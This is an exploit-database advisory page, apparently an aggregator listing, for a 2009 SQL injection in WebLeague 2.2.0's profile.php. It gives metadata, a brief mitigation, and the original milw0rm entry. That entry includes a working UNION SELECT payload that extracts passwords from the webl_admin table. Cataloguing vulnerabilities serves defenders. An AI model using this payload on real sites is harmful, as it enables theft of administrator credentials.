WebLeague 2.2.0 (profile.php) Remote SQL Injection

vendor:

WebLeague

by:

Arka69

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: WebLeague

Affected Version From: 2.2.0

Affected Version To: 2.2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:worms-league:webleague:2.2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

WebLeague 2.2.0 (profile.php) Remote SQL Injection

A SQL injection vulnerability exists in WebLeague 2.2.0 in the profile.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#########################################################
#                                                                                                             
# DESCRIPTION: WebLeague 2.2.0 (profile.php) Remote SQL Injection                  
# DISCOVERED BY: Arka69                                                                                                                       
# BUG: SQL Injection                                                                                  
# DOWNLOAD: http://www.worms-league.com/WebLeague/WebLeague2.2.0.zip    
#                                                                                                            
########################################################

 
EXPLOIT: profile.php?name='+UNION+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+webl_admin%23

# milw0rm.com [2009-07-15]